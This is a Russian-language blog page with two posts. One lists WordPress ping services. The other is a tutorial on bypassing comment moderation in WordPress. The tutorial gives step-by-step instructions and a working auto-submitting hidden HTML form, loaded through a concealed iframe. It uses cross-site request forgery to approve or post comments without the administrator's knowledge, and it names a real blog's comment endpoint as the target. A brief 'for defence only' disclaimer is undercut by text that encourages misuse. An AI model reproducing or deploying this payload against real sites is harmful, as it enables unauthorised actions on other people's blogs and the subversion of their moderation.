Касательно WordPress.
Стандартная инсталяция вордпресса сама пингует развалы блогов используя rpc.pingomatic, к сожалению их там не так много. Поэтому рекомендую перейти в административной панели Options>Writing и добавить еще следующий список:
http://rpc.blogrolling.com/pinger/
http://www.bitacoles.net/ping.php
http://rpc.wpkeys.com
http://rpc.technorati.com/rpc/ping
http://rpc.britblog.com
http://pingoat.com/goat/RPC2
http://bulkfeeds.net/rpc
http://rpc.weblogs.com/RPC2
http://api.my.yahoo.com/RPC2
http://services.newsgator.com/ngws/xmlrpcping.aspx
http://api.moreover.com/ping
http://api.moreover.com/RPC2
http://www.blogpeople.net/servlet/weblogUpdates
http://ping.fakapster.com/rpc
http://www.blogoon.net/ping/
http://ping.bloggers.jp/rpc/
http://bblog.com/ping.php
http://rpc.tailrank.com/feedburner/RPC2
http://ping.bitacoras.com
FeedBurner
http://ping.myblog.jp
http://ping.syndic8.com/xmlrpc.php
http://ping.weblogalot.com/rpc.php
http://pinger.blogflux.com/rpc
http://blogsearch.google.com/ping/RPC2
http://blog.goo.ne.jp/XMLRPC
Blogs Trend Tool - IceRocket
http://rpc.pingomatic.com
http://api.feedster.com/ping.php
http://api.moreover.com/RPC2
http://rpc.pingomatic.com/
http://www.bloglines.com/ping
http://ping.feedburner.com
http://rpc.technorati.com/rpc/ping
http://blogsearch.google.com/ping/RPC2
http://api.my.yahoo.com/RPC2
http://rpc.weblogs.com/RPC2
http://ping.weblogalot.com/rpc.php
http://api.feedster.com/ping
http://ping.syndic8.com/xmlrpc.php
Friday, March 9, 2007
Надоел pingomatic? Вот так индексировать блог намного лучше и быстрее :)
Posted by Victor Supryatkin at 1:52 PM 0 comments
Labels:
hack wordpress,
ping
Thursday, December 14, 2006
Как взломать комментарии в WordPress
*Примечание: Этот текст можно использовать только для ознакомления и последующей защиты своего блога. По материалам ВанДер Граафа.
Как взломать комментарии в WordPress?
WordPress считается одним из самых защищенных движков, но и он имеет некоторые уязвимости. Я расскажу как с помощью правильной последовательности команд ТВОЙ блог смогут взломать и спокойно добавлять комментарии в без ведома администратора.
1. Найдите блог на движке WordPress где вы хотите поместить комментарий, но модератор вам этого никогда не позволит.
2. Создайте страничку, содержащую некоторую информацию, но с очень маленьким iframe. Оставьте пустым URL для iframe.
3. Найдите где расположен wp-login.php. Обычно он располагается в той же директории что и блог.
4. Введите комментарий, который вы хотите добавить, но не нажимайте кнопку Submit. Посмотрите в тексте страницы id последнего коментария: <li class=”" id=”comment-7″>. Твой комментарий будет содержать следующее значение (в нашем случае 7+1=8). И посмотрите номер post id <div class=”post” id=”post-10″> (в нашем случае 10).
5. Теперь отредактируйте страницу вместе с iframe и установите iframe на:http://(blog directory)/wp-admin/post.php?action=mailapprovecomment&p=10&comment=8
6. Напишите первый комент и потом можно писать коменты с завлекательной ссылкой на ваш блог вместе со скрытыми iframeмами. Ты также можешь ссылку на свою страницу в первом коменте без добавления второго.
7. Прикрой свою задницу удалением iframe.
8. Сделал!? Теперь вступает в дело модератор! (9 и 10 шаги можешь пропустить они слишком эзотерические)
9. Модератор смотрит по своим логам из контрольной панели и начинает резать Твои комментарии.
10. Он смотрит Твои комментарии, как добавленные свои и подсознательно связывает их со своими и одобряет их. Или нет…:)
11. Хочешь добавлять комментарии без ведома модератора?
12. Смотри исходники формы комментария. Найди там action=”". Скопируй URL и посмотри comment_post_ID.
13. Помести этот код на страницу, которую запрашиваешь через iframe.
<HTML>
<BODY>
<form name='f' method='post' action='http://www.mattcutts.com/blog/wp-comments-post.php' style="display:none;"><!-- enter the url -->
<textarea name="comment">ХАХАХАХА</textarea><!-- enter your message -->
<input name="submit" type="text" value="Submit Comment" />
<input type="hidden" name="comment_post_ID" value="215" /><!-- enter the right number -->
<input name='s' type='submit' value='submit' />
</form>
<script>
document.f.s.click();
</script>
</BODY>
</HTML>
Как видишь крякнуть очень легко. Вот и думай теперь что делать со своим блогом и как его защитить от взлома! Хотя почему то мне кажется у Тебя появились другие мысли.
ЗЫ: Что делать? Ответ будет в другом выпуске. )
Posted by Victor Supryatkin at 1:02 PM 5 comments
Labels:
hack wordpress